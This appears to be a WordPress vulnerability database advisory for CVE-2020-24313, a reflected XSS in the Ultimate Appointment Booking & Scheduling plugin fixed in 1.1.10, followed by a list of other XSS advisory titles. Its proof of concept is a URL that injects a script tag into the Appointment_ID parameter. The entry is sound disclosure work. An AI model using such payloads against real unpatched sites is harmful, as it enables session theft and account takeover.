Ultimate Appointment Booking & Scheduling < 1.1.10 – Authenticated Cross-Site Scripting (XSS) | CVE 2020-24313 | Plugin Vulnerabilities

Description

The Ultimate Appointment Booking & Scheduling WordPress plugin, versions 1.1.9 and older, were vulnerable to Authenticated Cross-Site Scripting (XSS) within multiple parameters.

Proof of Concept

http://www.example.com/wp-admin/admin.php?page=EWD-UASP-options&Action=EWD_UASP_AppointmentDetails&Selected=Appointment&Appointment_ID=1"><script>alert(1)</script>

Affects Plugins

ultimate-appointment-scheduling

Fixed in 1.1.10

References

CVE

URL

https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/

URL

https://plugins.trac.wordpress.org/changeset/2327552/ultimate-appointment-scheduling

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

zerodetail & ratherbland

Verified

No

WPVDB ID

14167153-38b7-4c5d-a03f-a1626ef5ef6d

Timeline

Publicly Published

2020-08-10 (about 5 years ago)

Added

2020-08-26 (about 5 years ago)

Last Updated

2020-08-27 (about 5 years ago)

Other

Published

Title

Published

2016-07-13

Title

All in One SEO Pack <= 2.3.7 - Unauthenticated Stored Cross-Site Scripting (XSS)

Published

2025-03-31

Title

PowerPack Elementor Addons (Free Widgets, Extensions and Templates) < 2.9.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-03-24

Title

WP Colorful Tag Cloud <= 2.0.1 - Reflected Cross-Site Scripting

Published

2023-12-19

Title

WooCommerce Menu Extension <= 1.6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-06-22

Title

SULly < 4.3.1 - Reflected XSS